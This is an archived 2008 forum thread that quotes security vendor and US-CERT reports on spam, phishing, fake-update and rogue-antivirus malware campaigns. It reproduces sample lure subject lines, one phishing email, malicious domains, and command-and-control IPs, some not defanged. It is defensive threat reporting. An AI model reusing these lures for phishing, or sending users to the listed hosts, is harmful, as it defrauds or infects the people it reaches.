View Full Version : SPAM frauds, fakes, and other MALWARE deliveries - archive
AplusWebMaster
2008-02-01, 12:38
FYI...
- http://preview.tinyurl.com/3xqd9o
January 31, 2008 (Infoworld) - "...The Anti-Phishing Working Group (APWG) said in a new report* Thursday that it saw a sharp rise in November in malware that directs users to DNS servers controlled by phishers. DNS servers play a crucial role in locating Web sites. The servers translate a domain name into an IP address, enabling a Web site to be located and accessed through a browser. Often, the phishers will set up their own DNS server that works fine most of the time but can redirect to their own malicious site. Tainting a person's DNS settings is particularly dangerous since the user probably won't notice the redirection, the APWG said. "The fraudulent server replies with 'good' answers for most domains; however, when they want to direct you to a fraudulent one, they simply modify their name server responses," the report said. Phishers are also employing malware that modifies an internal PC file called the hosts, which is used to match domain names of Web sites with IP addresses. When a person visits a Web site, the browser checks the hosts to see if it has an IP address for a particular domain name. If the hosts file is corrupted or hijacked, the browser can be directed to fetch a different Web page than the one the user intended to go to. Both attacks -- also known as pharming -- are dangerous, since a user may be typing in the correct URL but be directed to the phishing site..."
* PDF file: http://www.antiphishing.org/reports/apwg_report_nov_2007.pdf
Also see:
> http://forums.spybot.info/showpost.php?p=156715&postcount=8
:fear::spider:
AplusWebMaster
2008-03-30, 15:09
FYI...
Speed up your PC! for FREE!
- http://www.sophos.com/security/blog/2008/03/1072.html
27 March 2008 - "What’s the easiest (and cheapest) way to get a faster computer?... numerous tools and applications insist on clogging up their system drive with poorly written uninstallers, gigabytes of temporary files and those annoying startup agents that load with Windows and sit resident in memory just in case they’re needed. It’s common then, for these users to turn to third party tools to clean up their computers. For the most part, these tools work pretty well. However, these programs are not always what they seem... To the unsuspecting computer users, this software looks like the perfect thing to clean up their computer. It appears simple, easy to use, small and free. Just the sort of things we’re looking for right? Wrong! This tool will “optimise” your computer by deleting a lot of critical system files. The end result is that your computer is rendered un-bootable and you’re left hoping that you have made a full system backup recently... this malicious program is detected by Sophos as Troj/Sysdel-B..."
Fake shooting scam used in Trojan attack
- http://www.sophos.com/security/blog/2008/03/1238.html
29 March 2008 - "... SophosLabs noticed a new scam designed to fool users into viewing a web site where they would be hit with a malicious script that installs a spy Trojan. We saw several spam messages alerting users to the supposed shooting of the e-Gold founder... A variety of domains have been used in the scam. Browsing to each of the domains redirects to a malicious page on another server... The script attempts to exploit several client-side vulnerabilities in order to download and install a Trojan... Specific detection for the Trojan and the files it installs has been added as Troj/Agent-GUJ. This is yet another example of the attackers using a blend of spam and malicious web sites to infect victims..."
Swim in $$$ = Swim with Sharks!
- http://www.sophos.com/security/blog/2008/03/1237.html
28 March 2008 - “Im ************, i swim in money $$$
I want you to swim with me!!! send this file to all friends and join me!!”
If you are swimming with Troj/Nymod-A and looking at what appears to be the random picture of some person, you are definitely swimming with the sharks. Troj/Nymod-A drops a file called ^^^^^.exe (proactively detected by Sophos as Mal/Basine-C) and sets it to autostart everytime you reboot your computer. File ^^^^^.exe has process monitoring which just respawns itself if you kill the handle running ^^^^^.exe. Finally it tunnels through your firewall and contacts a remote server whose domain ends in “.ru”! This has opened your computer to the $$$ sharks who might steal information from you, or steal your computer’s resources = $$$ for them."
(Screenshots available at each URL above.)
:fear::spider:
AplusWebMaster
2008-06-09, 15:25
FYI...
More fake "Hallmark ecards"...
- http://blog.trendmicro.com/greeting-cards-spread-no-cheer/
June 9, 2008 - "Thinking that someone just remembered you and sent you a Hallmark greeting card? Think again, before you open the email attachment. Today, we received a spam allegedly from Hallmark. Once you run the file named postcard.exe, it will automatically open Notepad with some garbage characters to distract users while the malware is being installed... Trend Micro detects this malware as TROJ_INJECTOR.DD... The malware drops copies of itself and creates registry entries to ensure its automatic execution at every system startup. This is not the first time malware authors tried to trick users by exploiting their curiosity and desire to receive good tidings via greeting cards: Storm started out much the same way, including the use of eCards, and well into 2007."
---------------------------------
Phishers drop MySpace bait
- http://blog.trendmicro.com/phishers-drop-myspace-bait/
June 9, 2008 - "...new phishing attack that leads to the download of malware. However, unlike most instances where phishing baits are usually banks, credit unions or other financial institutions, this time it uses the popular social networking Web site MySpace.com. The phishing URL may be contained in spammed email messages. Once recipients of said messages click or visit the URL, it displays a spoofed MySpace login page. It also uses a popup window declaring a supposed MySpace profile object error and requires that the user download the new version of a new MySpace profile object. Therein lies the trick: When the user clicks the “continue” button, malicious files are not only downloaded but also automatically installed. The said malicious files are detected as TROJ_ZLOB.GUZ and BKDR_IRCBOT.BGY... And if the user tries to exit the page, it will not close until the said file is downloaded. To exit, a user needs to terminate the program using Task Manager... phishing URL hxxp ://{BLOCKED}ce404-error.farvista.net/myspace.php ..."
(Screenshot available at the TrendMicro URL above.)
:fear::fear:
AplusWebMaster
2008-07-04, 22:18
FYI...
- http://securitylabs.websense.com/content/Alerts/3130.aspx
07.04.2008 - "Websense® Security Labs™ ThreatSeeker™ Network has discovered a substantial number of spam messages utilizing a social engineering tactic that lures users to download malicious software... The recent media coverage discussing Osama Bin Laden seem to have prompted spammers to quickly recycle an old spam campaign... We have seen the same malicious executable used throughout different spam campaigns bearing following email subjects lines:
Jennifer Aniston Interesting mp3!!!
Clara Morgane Shocking photo!!!
Kylie Minogue Interesting video without cowards!!!
Demi Moore New sexy songs!!!
Avril Lavigne Shocking porno dvd!!!
Nicole Richie Kick-up cd!!!
Beyonce Shocking sexy songs!!!
Keira Knightley Gallery photo!!!
Britney Spears Interesting cd!!! ..."
(Screenshots available at the URL above.)
:fear::spider::sad:
AplusWebMaster
2008-07-29, 19:42
FYI...
Attachment contains same Trojan horse that stole 1.6M records from Monster.com last year
- http://preview.tinyurl.com/66ayhz
July 28, 2008 (Computerworld) - "Several airlines, including Delta Air Lines Inc. and Northwest Airlines Corp., have warned customers that bogus e-mails posing as ticket invoices contain malware and urged them to immediately delete the messages. A researcher at McAfee Inc. confirmed the campaign in a post to the company's blog*. The e-mails, which purport to be from an airline, thank the recipient for using a new "Buy flight ticket Online" service on the airline's site, provide a log-in username and password, and say the person's credit card has been charged an amount usually in the $400 range. An attachment claims to be the invoice for the ticket and credit card charge..."
* http://www.avertlabs.com/research/blog/index.php/2008/07/25/invoice-spam-takes-flight/
:fear:
AplusWebMaster
2008-07-31, 14:05
More of same...
- http://www.f-secure.com/weblog/archives/00001477.html
July 30, 2008 - "... Today when we saw a large spam run sending out fake JetBlue etickets... The mail contains a ZIP file that contains the file eTicket#1721.exe which we detect as Trojan-Spy:W32/Zbot.QO. The malware itself tries to steal usernames and passwords to online banks..."
(Screenshot available at the F-secure URL above.)
- http://www.us-cert.gov/current/#airline_e_ticket_email_attack
July 31, 2008
:fear:
AplusWebMaster
2008-08-05, 13:32
FYI...
- http://isc.sans.org/diary.html?storyid=4828
Last Updated: 2008-08-05 00:45:33 UTC - "If you missed last week's chance to get your "airplane ticket", you currently have a second opportunity. Emails are making the rounds that claim to come from CNN, and carry a subject of "CNN.com Daily Top 10". Well, they are neither. But the emails contain click-friendly headlines with enticing subjects like "Will all Americans be obese by 2030?" Now who wouldn't want to read THAT?!
Clicking takes you to the netherworld, of course. You currently receive a file called "get_flash_update.exe" (yeah, sure!). Detection for the sample is coming on line, see http://www.virustotal.com/analisis/258fbdfb7eb6ecfedbf236533b03c945
[Result: 10/35 (28.57%)]
The domain "idoo .com" seems to be up to no good. Other involved domains are too numerous to list, but about 50 of them currently resolve to 200.46.83.233. That's in Panama."
:fear:
AplusWebMaster
2008-08-05, 22:42
FYI...
Phishers play the Olympics
- http://blog.trendmicro.com/phishers-play-the-olympics/
08.04.2008 - "Olympic tickets anyone? They are available in the Internet of course, but users beware: the bad guys are still working hard to steal from online users as the 2008 Beijing Olympic approaches... fake Beijing Olympics Web site supposedly selling tickets. The Los Angeles Times reports* that Olympics officials have already asked federal courts to shut down certain Web sites that pose as sellers of tickets but actually are stealing credit card numbers and other confidential information..."
* http://www.latimes.com/technology/la-sp-olytickets2-2008aug02,0,7568966.story
- http://securitylabs.websense.com/content/Alerts/3152.aspx
08.05.2008 - "Websense... has discovered a rogue Beijing Olympics ticket lottery Web site. The Web site uses the hostname beij***2008.cn, a clear typo-squat to the official Olympic Games Web site at http://www.beijing2008.cn/. Benefiting from the hype around the purchasing of tickets for the Games, the social engineering tactic behind this scam is to lure users into dialling a toll number to retrieve an access code for an available ticket. The toll number is likely an additional revenue generator for the scammers as callers would then be charged a premium rate for making that phone call. Users who input the supplied access code are forwarded to a further Web page designed to collect personal information. They then have the incentive to enter credit card details, to pay a relatively small sum of RMB600 for the ticket (approximately 87 USD). This phishing Web site goes a step further than most phishing sites by employing a phone-call "verification" step. This higher level of interactivity and supposed verification garners more trust from unsuspecting users..."
(Screenshots available at the TrendMicro and Websense URLs above.)
:fear::mad::sad:
AplusWebMaster
2008-08-06, 05:03
FYI...
FAKE Adobe Flash Player
- http://www.us-cert.gov/current/#malware_targeting_adobe_flash_player
August 5, 2008 - "Adobe has issued a Security Bulletin* warning of malware spreading via a fraudulent Flash Player installer. Adobe warns that a worm is making fraudulent posts on social networking sites. These posts include links that lead to fake sites that prompt users to update their versions of Flash Player. If users attempt to use the installer to make the update, malware may be downloaded and installed onto their systems..."
* http://blogs.adobe.com/psirt/2008/08/verifying_installers.html
"...do -not- download Flash Player from a site other than adobe.com... If the download is from an unfamiliar URL or an IP address, you should be suspicious..."
:fear::mad:
AplusWebMaster
2008-08-06, 19:06
More...
Compromised Web Servers Serving Fake Flash Players
- http://ddanchev.blogspot.com/2008/08/compromised-web-servers-serving-fake.html
August 05, 2008 - "...This campaign serving fake flash players is getting so prevalent these days due to the multiple spamming approaches used, that it's hard not to notice it - and expose it... As far as the owner's are concerned, it appears that some of them are already seeing the malware page popping-up on the top of their daily traffic stats, and have taken measures to remove it... The structure of the malware campaign is pretty static, with several exceptions where they also take advange of client-side vulnerabilities (Real player exploit) attempting to automatically deliver the fake flash update or player depending on the campaign. On each and every site, there are dnd.js and master.js scripts shich serve the rogue download window, and another .html file, where an IFRAME attempts to access the traffic management command and control, in a random URL it was 207.10.234.217/cgi-bin/index.cgi?user200. A sample list of participating URLs, most of which are still active and running... (the list is way too long to post here - see ddanchev.blogspot URL above.)...
Sample detection rate : flashupdate.exe
Scanners Result: 35/36 (97.23%)
Trojan-Downloader.Win32.Exchanger.hk; Troj/Cbeplay-A
File size: 78848 bytes
MD5...: c81b29a3662b6083e3590939b6793bb8
SHA1..: d513275c276840cb528ce11dd228eae46a74b4b4
The downloader then "phones back home" at 72.9.98.234 port 443 which is responding to the rogue security software AntiSpy Spider...
Sample detection rate : antispyspider.msi
Scanners Result: 11/35 (31.43%)
FraudTool.Win32.AntiSpySpider.b;
File size: 1851904 bytes
MD5...: 2f1389e445f65e8a9c1a648b42a23827
SHA1..: e32aa6aa791e98fe6fdef451bd3b8a45bad0acd8
The bottom line - over a thousand domains are participating, with many other apparently joining the party proportionally with the web site owner's actions to get rid of the malware campaign hosted on their servers."
---
* http://www.adobe.com/go/getflashplayer
Current Adobe Flash Player version 9.0.124.0
:fear::fear:
AplusWebMaster
2008-08-08, 18:03
FYI...
Bogus CNN Custom Alerts
- http://securitylabs.websense.com/content/Alerts/3154.aspx
08.08.2008 - " Websense... has discovered replica CNN Custom Email Alerts being sent out via spam emails. These emails contain links to a legitimate news page, but have been designed to encourage users to download a malicious application posing as a video codec. Over the last few days, the ThreatSeeker Network has seen huge volumes of spam wrapped up in CNN-themed templates - most recently email alerts listing the Daily Top 10 Stories and Videos, which also encouraged users to download a video codec (again a malicious file)... The malicious payload is only accessed when the user clicks on the ‘FULL STORY’ link - the first link behind the story title leads to a legitimate news page hosted on CNN. The news story is a recent article centered around the Beijing Olympics. The ‘FULL STORY’ link takes users to a Web page by the name of cnn****.html. This issues a pop-up encouraging users to download a ‘missing’ video codec, a file called adobe_flash.exe... Our Security Labs have also seen evidence of this campaign and recent others being distributed via blog spam to further increase the chance of success..."
(Screenshots available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2008-08-11, 16:19
FYI...
IM: Instant Malware... Yahoo! Messenger fraud
- http://blog.trendmicro.com/instant-malware/
08.10.2008 - "Instant messaging (IM) applications are popular infection vectors — malware authors are known to use instant messaging platforms to spread malware by sending either malicious files or URLs. Trend Micro researchers have recently witnessed spammed email messages that use the popular IM application Yahoo! Messenger in propagating malware, but in a very different way than previosuly mentioned... Clicking the Download now link downloads the file msgr8.5us.exe into the affected system. When executed, it drops the following files:
* mirc.ini - detected by Trend Micro as Mal_Zap
* csrss.exe - detected by Trend Micro as BKDR_ZAPCHAST.AX
* sup.exe - detected by Trend Micro as BKDR_MIRCHACK.CE
For targeted victims which do, in fact, use Yahoo! Messenger, the promised update may prove hard to resist. The same email message even instructs users to pass the news to friends by sending them the source - not very friendly if the supposed update would lead one’s contacts to malware... Downloading from the software vendors themselves still is the safest way to go."
(Screenshot available at the URL above.)
:fear:
AplusWebMaster
2008-08-14, 00:29
FYI...
Bogus CNN/MSNBC news...
- http://securitylabs.websense.com/content/Alerts/3159.aspx
08.13.2008 - "Websense.... has discovered a new replica wave of 'msnbc.com - BREAKING NEWS' alerts that are being sent out via spam emails. Similar to previous attacks related to 'Bogus CNN Custom Alerts', these emails contain links to a legitimate news page, but are designed to encourage users to download a malicious application posing as a video codec... Over the last few days, the ThreatSeeker Network has seen huge volumes of spam wrapped up in CNN-themed templates - most recently email alerts listing the different popular events and news articles, which also encouraged users to download a video codec, which was actually a malicious file. (The malicious payload is only accessed when the user clicks on the ‘breakingnews.msnbc.com’ link, which takes users to a Web page named up.html. This page issues a pop-up encouraging users to download a ‘missing’ video codec, a file called adobe_flash.exe.)
Here are a few examples of the varied subjects we have seen in this campaign:
msnbc.com - BREAKING NEWS: Michael Phelps wins 10th career gold, making him the winningest Olympian in history
msnbc.com - BREAKING NEWS: China beats out U.S. for gold in women's team gymnastics
msnbc.com - BREAKING NEWS: Dark Knight establishes dominance with 400 million mark
msnbc.com - BREAKING NEWS: How to save money on gas
msnbc.com - BREAKING NEWS: Preliminary polls for the election
msnbc.com - BREAKING NEWS: McDonald's found to breach FDA regulations, suspended from trading
msnbc.com - BREAKING NEWS: Jury duties for you
msnbc.com - BREAKING NEWS: Find out how to get top returns for your money at minimum risk
msnbc.com - BREAKING NEWS: Abortion outlawed in California
msnbc.com - BREAKING NEWS: Buy gold at lowest prices and make immediate profits
msnbc.com - BREAKING NEWS: Anthrax case solved
msnbc.com - BREAKING NEWS: Arsenal buys Ronaldo from Man Utd
msnbc.com - BREAKING NEWS: Too much freedom will destroy America
msnbc.com - BREAKING NEWS: Copycat murderer beheads woman on Greyhound bus
msnbc.com - BREAKING NEWS: NASDAQ index gains 720 points overnight upon war announcement
msnbc.com - BREAKING NEWS: Sony announces replacement to successful PSP gaming system
msnbc.com - BREAKING NEWS: Americans loves to sue people
msnbc.com - BREAKING NEWS: Please give your opinions for change
msnbc.com - BREAKING NEWS: Sandwich recall amid Salmonella outbreak ..."
(Screenshots available at the Websense URL above.)
- http://www.f-secure.com/weblog/archives/00001485.html
August 13, 2008 - "...Apparently people stopped clicking on -fake- CNN links as today the attackers switched the mails to look like they are now coming from MSNBC..."
CNN and MSNBC Olympic spoof emails - 5 million spam messages per hour
- http://securitylabs.websense.com/content/Blogs/3160.aspx
08.14.2008
:fear::mad:
AplusWebMaster
2008-08-15, 14:39
FYI...
- http://preview.tinyurl.com/5wqxqt
08-14-2008 (Symantec Security Response Blog) - "...With infections dating back to January 2007 and a P2P structure largely unchanged in about a year, Peacomm continues to evolve and infect new hosts. In early August our honeypots began capturing a new version of Peacomm. This iteration has been relatively low key as it propagates via users visiting infected Web sites, rather than by spam. Although Peacomm has been distributed via infected Web sites in the past, they were usually Web sites that were spammed to users as opposed to relying on drive-by downloading to gather its new recruits. The attack toolkit used to install Peacomm in these drive-by attacks has changed as well. The infection begins with a user visiting an infectious Web site, which silently -redirects- the user to hostile content on a set of registered domains via an IFRAME. At this point, Kallisto TDS will serve a set of exploits against the victim. These include Acrobat PDF CollectEmailInfo*, ANI Header Size**, and MDAC***..."
* http://www.securityfocus.com/bid/27641/solution
** http://www.securityfocus.com/bid/23194/info - MS07-017
*** http://www.securityfocus.com/bid/17462 - MS06-014
> AKA CME-711 - http://cme.mitre.org/data/list.html#711
:fear::fear:
AplusWebMaster
2008-08-18, 01:47
FYI...
- http://isc.sans.org/diary.html?storyid=4913
Last Updated: 2008-08-17 21:43:58 UTC - "The spoofed CNN and MSNBC messages from last week have altered a bit, taking on a more generic approach. The subject of the message is still: BREAKING NEWS. Michael has been tracking these botnets for a while, his work is available here: http://www.vivtek.com/projects/despammed/stormspam.html .
Like the others, this first stage is a downloader, still reaching out to 66.199.240.138* to get the rest of the goodies. Unlike the previous waves, the first executable is named install.exe instead of adobe_flash.exe..."
* http://centralops.net/co/DomainDossier.aspx
canonical name: 66-199-240-138.reverse.ezzi.net.
Registrant: EZZI.net
A Service of AccessIT
75 Broad Street
Suite 1902
New York, NY 10004 US
Domain Name: EZZI.NET
:fear::fear:
AplusWebMaster
2008-08-18, 17:29
FYI...
Fake FedEx emails
- http://securitylabs.websense.com/content/Alerts/3161.aspx
08.18.2008 - "...The notifications claim to be from FedEx and explain that a package sent by the recipient in the past month was not delivered. The message has an attachment claimed to be a copy of the invoice. The attachment is in a zip file but is actually a Trojan Downloader. This spam wave is a continuation of an ongoing theme used in recent months of using a parcel service invoice as the social engineering attack vector..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2008-08-19, 14:25
FYI...
Facebook - Viral SPAM
- http://securitylabs.websense.com/content/Blogs/3162.aspx
08.18.2008 - "... We've had to create numerous tools and methods to detect these types of attacks because most Web 2.0 social networking sites are difficult to track due to limited public access to most accounts. Most social networking accounts can only be viewed if the account holder explicitly accepts or requests another account to be added as a "friend". A generic Web crawler and even a search engine Web crawler would not be able to mine the pages on a social networking site due to lack of permission... attacks on Facebook and MySpace are nothing new. There have been continual, targeted Facebook attacks for some time now... A very enticing email was sent to one of our test accounts, letting us know that something had been written about us, and that we'd probably want to read more about it. An average user would probably want to know what was written about them, especially because it's on a public blog such as blogspot. Most users have an enormous amount of trust in their fellow Facebook friends. So, the chances of a user clicking on one of these emails is tremendously high. The attackers in this case were able to legitimately have Facebook send a spam email by compromising an account that the test user was "friends" with, and writing a comment on the test user's wall. Writing on the wall triggered an automatic email to the test user's email account with the message that was written on the wall. So, in this case Facebook wall writing is being used as a mechanism to send spam... this particular attack has been going on for over six months. The phishing URL... was registered in July 2008, but several domains have been used in this ongoing attack. It's nameserver is responsible for a load of other phishing domains, including numerous MySpace phishing pages. Users are clicking on these links manually, either when they receive them in email or read them on their walls. They click on the link, get redirected to a phishing page, and manually input their credentials. Attackers are then using their credentials to post manually and perhaps automatically to their wall, as well as their friends' walls, allowing them to spread within the walls of the social networking world. As social networking sites become the place where the majority of Web users are spending the majority of their Internet time, we're going to see more and more MySpace, Facebook, and other social networking attacks. Web 2.0 Web sites open up a huge attack vector to exploit transitive trust. Attackers know it, and are actively taking advantage of it.
References:
http://pi3141.wordpress.com/2008/08/16/facebook-phishing-warning/
http://www.matthewbigelow.com/2008/08/18/watch-out-for-the-fanebook-facebook-forgery/
http://thenextweb.org/2008/08/10/facebook-under-massive-phishing-attack-from-china/ "
(Screenshots available at the Websense URL above.)
:fear::fear:
AplusWebMaster
2008-08-20, 16:07
FYI... (Screenshot available at the URL below.)
- http://blog.trendmicro.com/photobucket-gets-phished/
August 19, 2008 - "Photobucket is, by far, one of the largest photo-sharing sites in the world. It is generally used for personal photographic albums, remote storage of avatars displayed on Internet forums, and storage of videos. Lots of people may like to keep their albums private, allowing password-protected guest access, or open them up to the public. And now this photo-sharing site is being attacked by phishers... The login page above looks exactly like the original site that lures the users to enter their user name and password. Once victims enter their credentials, phishers can use them to obtain full access to their Photobucket account, and may use their albums to insert malicious code... popular image hosting sites have become the targets of several different attacks:
Turkish Hackers Relive Memories in Photobucket
- http://blog.trendmicro.com/turkish-hackers-relive-memories-in-photobucket
06.25.2008
Two New Yahoo Phish Sites
- http://blog.trendmicro.com/two-new-yahoo-phish-sites ..."
07.31.2008
:fear::fear:
AplusWebMaster
2008-08-21, 18:11
FYI...
Russia-Georgia conflict - malware SPAM
- http://www.us-cert.gov/current/#malware_circulating_via_russia_georgia
August 21, 2008 - " US-CERT is aware of public reports* of malware circulating via spam email messages related to the Russia/Georgia conflict. These messages contain factual information about the conflict. The messages also contain download instructions for the user to watch a video that is attached to the message. If a user opens the attachment, malware may be downloaded and installed onto their system..."
* http://preview.tinyurl.com/58u83x
08-21-2008 (Symantec Security Response Blog)
Russia/Georgia Conflict News Used to Hide Malicious Code in Spam
"...The messages themselves contain an attachment, along with instructions and passwords for the download of the attachment... One subject line that has been seen reads:
“Subject: Journalists Shot in Georgia”... The attachment contains no videos; rather, the attachment redirects to a link that delivers a payload identified as Trojan.Popwin... We have observed several -million- instances of this particular spam attack delivering malicious code..."
:fear::spider::fear:
AplusWebMaster
2008-08-22, 00:20
FYI...
- http://sunbeltblog.blogspot.com/2008/08/continuing-creativity-in-trojan.html
August 21, 2008 - "We’ve seen the same trojan being sent to inboxes in all kinds of ways — and seemingly obsessively on the subject of Angelina Jolie. Minor shift, now they’re putting the fake codec window right in the spam. Pushes video.avi.exe, a fake alert trojan which invariably installs Antivirus XP 2008 or some such rogue security program."
(Screenshot available at the URL above.)
:fear:
AplusWebMaster
2008-08-26, 18:18
FYI...
- http://isc.sans.org/diary.html?storyid=4927
Last Updated: 2008-08-24 18:15:34 UTC - "I received an email today from a reader (thank you) who reported that they received a piece of spam today that came from the address: monitoring @isp.com. (Notice the domain name.) Now, we have seen this type of spam before, you know, perpetrating like it comes from your ISP while just having a malicious link in it, etc. Except this time the spam was signed "ISC monitoring team" (Notice the first three letters, and how they differ from the domain name). So I am guessing that someone is trying to imitate us. And while we recognize that imitation is the most sincerest form of flattery, this kind could be actually damaging. Rest assured our faithful readers, this is not from us. First of all our email addresses are not "isp.com", nor "monitoring". We don't sign our emails "ISC monitoring team". Nor do we spell the word "Consortium" -- "Consorcium" (misspelling from the email)..."
- http://www.f-secure.com/weblog/archives/00001488.html
August 26, 2008 - "This morning we saw several spam runs in the country of Denmark. The messages are in Danish and they are sent to Danish e-mail addresses. The e-mail claims to be from us. It's not. Here's what the email looks like:
From: supportupdate@f-secure.com
Date: 26. August 2008 08:31
Subject: Data er tillagt og sendt med denne meddelelse.
Käre kunder!
Regning
Data er tillagt og sendt med denne meddelelse.
Jeg bruger gratis F-secure antispamversion, som allerede har fjernet 338 spambreve.
Antispam er helt gratis for private brugere.
Attachment: f-secure.rar
The attachment contains a file called update26.08.2008.exe, which, when run, drops a file called dcbcg.exe (Unker-related trojan) that connects to a server in Ukraine. We detect this trojan as Trojan:W32/Agent.FVO... The spam run must have been fairly large, as we've received more than 13,000 bounces to supportupdate @f-secure.com from non-existant email addresses alone..."
:fear:
AplusWebMaster
2008-08-27, 22:32
FYI...
‘Want to Know Who Deleted You on MSN Live?’
- http://blog.trendmicro.com/want-to-know-who-deleted-you-on-msn-live/
Aug. 26, 2008 - "While monitoring countless sites as part of our current Web threat strategy, we have stumbled upon a legitimate-looking prompt from MSN Live Messenger... or so it would appear (at first). As shown from the screen captures below, this prompt bears a close resemblance to the actual prompt being displayed by the MSN Live Messenger instant messaging application (also known as Windows Live Messenger) whenever a friend from the user’s friends list logs in. Potential victims who unfortunately encounter the site (Borradito.com) via spam or spammed IM is first enticed by the Web site’s description, which promises the capability to view which of their friends have removed them from their friends list, provided they are logged in, of course—a pretty convincing trick to lure users to key in their user names and passwords. As the Web site is accessed, a message prompt from MSN Live Messenger appears at the lower-right part of the screen, just below the system tray... Once users click on the prompt, they are diverted to a Flash-based window which also resembles an actual MSN group chat window... This routine is used to attract the users, as well as to build credibility. If the user goes back to the main site and enters their credentials, the site displays a list of users who have allegedly removed the affected user from their contact lists... What happens under the radar, however, is that the site captures the entered credentials and the accounts are then opened by a remote malicious user and IM messages containing a link to the Borradito phishing site are sent to all contacts on the affected account’s buddy list... This ensures further propagation of this threat. Directly at risk are MSN users and their contacts. The account information harvested in this account may be used to access various Windows Live services such as Windows Live Call (PC-to-phone calls), SkyDrive (file-sharing services), Spaces, and even Hotmail accounts under the same account. Today, your email accounts hold many important tidbits on different aspects of your life, job, and personal details many people would prefer not to be divulged to others. Letting your guard down can be be very costly and can lead to exploitation. The worst possible scenarios include identity theft and financial loss..."
(Screenshots available at the URL above.)
:fear:
AplusWebMaster
2008-08-28, 13:02
FYI...
Critical Update: Please Patch Windows with Malware
- http://blog.trendmicro.com/critical-update-please-patch-windows-with-malware/
Aug, 27, 2008 - "After patching 11 vulnerabilities for this month’s Patch Tuesday, spam is being sent that falsely claims that the recipient should immediately install another critical Microsoft update... Patching one’s system using this spam as a guidance, however, downloads a multitude of badness, and one particular malicious piece of malware which is detected as EXPL_ANICMOO.GEN... Malware writers are counting on the urgency of the email’s tone to trick recipients into applying the “patch”..."
(Screenshot available at the URL above.)
:fear:
AplusWebMaster
2008-08-31, 17:09
FYI...
Treasury Optimizer - malware update
- http://blog.trendmicro.com/treasury-optimizer-updates-systems-with-malware/
Aug. 30, 2008 - "Treasury Optimizer is an online banking tool offered by Capital One Bank which aims to provide secure access to business accounts on the Web, 24/7. Posed to replace electronic money or more popularly known as eCash, it offers to protect customers’ accounts through security features such as multifactor authentication. Unfortunately, their security offerings come short, as we receive bulks of phishing emails that “promote” the Treasury Optimizer. The phishing mail instructs the client to update their account due to a potential security risk that affects all of Capital One Bank products, including the Treasury Optimizer... The conventional phishing attack aims to capture users’ credentials through fake login pages spammed through email. For this attack however, the phishing link given in the phishing email leads to a page that does not ask for credentials, but tells the user to download a file instead. When the user clicks the link contained in the phishing email, the following spoofed Treasury Optimizer Web page is displayed... The page explains that the bank had to fix (the) vulnerability; and in order to fix it, the client MUST download the update. It even displays different download links for different operating systems. It will then download an .EXE file that poses as an installation setup... The downloaded file is detected by Trend Micro as TROJ_SMALL.MAT. This malware-enhanced phishing attack is neither the typical type of phishing attack, nor is it less dangerous. The scope of a phishing attack is usually limited; one account from a target organization compromised in every successful attack. But this phishing attack installs a malware on the affected user’s system instead, and then uses it to monitor users’ online activities, thus possibly disclosing more information..."
(Screenshots available at the URL above.)
:fear::mad:
AplusWebMaster
2008-09-03, 23:28
FYI...
Fake celebrity news SPAM - Malicious Code
- http://securitylabs.websense.com/content/Alerts/3172.aspx
9.03.2008 - "...ThreatSeeker Network has seen huge volumes of spam wrapped up in CNN and MSNBC themed templates. Recently, email alerts listing different popular events and news articles also encouraged users to download a video codec, which was actually a malicious file... The malicious payload is only accessed when the user clicks on the 'READ FULL STORY' link, which takes them to a Web page on a compromised site named index97.html, which issues a pop-up encouraging users to download a ‘missing’ video codec, a file called video98.exe... Here are a few examples of the varied subjects we have seen in this campaign:
Sensational news. Check the message.
Breaking news! Be the first to know.
Very important news.
Astonishing Please take a look.
Sensational information inside.
Check this out. This is a bomb
This is really great news. Please check. ..."
(Screenshots available at the Websense URL above.)
:fear:
AplusWebMaster
2008-09-05, 00:26
FYI...
Misleading Application Targets Free Online Services
- http://www.securityfocus.com/blogs/1018
2008-09-03 (Symantec Security Response) - "...we have found that attackers have begun targeting free online service sites and our example is based on Google Notebook, although these attacks are not unique to this site. Attackers have started to use Google Notebook as a new social engineering attack vector to spread misleading applications. Misleading applications attempt to convince the user that he or she must remove potentially unwanted programs or security risks (usually nonexistent or fake) from the computer. Google Notebook is a free online service that provides a way to save and share information in a single location. This free service offers a feature to save search results, notes, or images online and allow users to share these artifacts with others. Users can create notes with headings and within each note they can add more content, such as links etc. Attackers are now taking advantage of this free service to create an attack vector to push misleading applications onto the victims' machines. While researching this problem we found cases where victims were invited to click on a malicious link. We found one author's notebook with more than 50 notes, including fake information and more malicious links... Clicking on the associated links lead to author's notebook pages, where the pages contain fake information and malicious links... Based on the contents, the victim is invited to click on the links to get additional information, but ends up getting fake pop-up messages generated by fake Web sites hosting misleading applications... When the victim clicks the OK button, a fake antivirus installer is downloaded to the victim's machine. The link on the "Microsoft Windows History" page contains a link to "hxxp ://anitspy .com". This link will redirect the page to "hxxp ://llab .com". If it is a user's first visit to the site, then the site will redirect that Web page to a malicious Web site (hxxp ://pc .com), which serves up a misleading application. In other instances the page will be redirected to a search site called "hxxp ://searcher .com," where the user will see an advertisement to download fake antivirus software. The complete scenario makes it seem as if attackers are running underground affiliate networks to promote misleading applications.
Social engineering attacks that involve victims who are tricked into clicking on malicious links are not new; however, now the attackers have started using free service sites as a new attack vector to push their misleading applications..."
(Screenshots available at the SecurityFocus URL above.)
:fear::mad:
AplusWebMaster
2008-09-09, 19:24
FYI...
SPAM campaign targeting US Presidential Election... Malicious Code
- http://securitylabs.websense.com/content/Alerts/3177.aspx
09.09.2008 - "Websense... has discovered an emerging email campaign which uses the US presidential election as a social engineering mechanism to install information-stealing code on a victim's machine. With less than 2 months before the start of the election, emails are circulating with fake news of a sex scandal affecting one of the candidates. Recipients of the email are encouraged to view a video supposedly involving the Democratic candidate Barack Obama. Users who click the link are shown a pornographic video taken from hxxp ://homemade*snip*.com/ . While the video plays for 14 seconds, malicious applications are installed on the victim's machine... The dropper installs 809.exe in the user's Temporary Internet Files folder. Also a Browser Helper Object (BHO) named Siemens32.dll is registered. This is an information-stealing application that posts data to a compromised Finnish travel site, hxxp ://*snip*-hotel.com/ ..."
(Screenshots available at the URL above.)
- http://www.f-secure.com/weblog/archives/00001497.html
September 10, 2008 - "...Interestingly, there is no Medved Hotel in Finland... we have reported this to local authorities and they are working on getting the site shut down."
(More screenshots...)
:fear::mad:
AplusWebMaster
2008-09-12, 13:32
FYI...
DHS email Scam
- http://www.us-cert.gov/current/index.html#dhs_email_scam
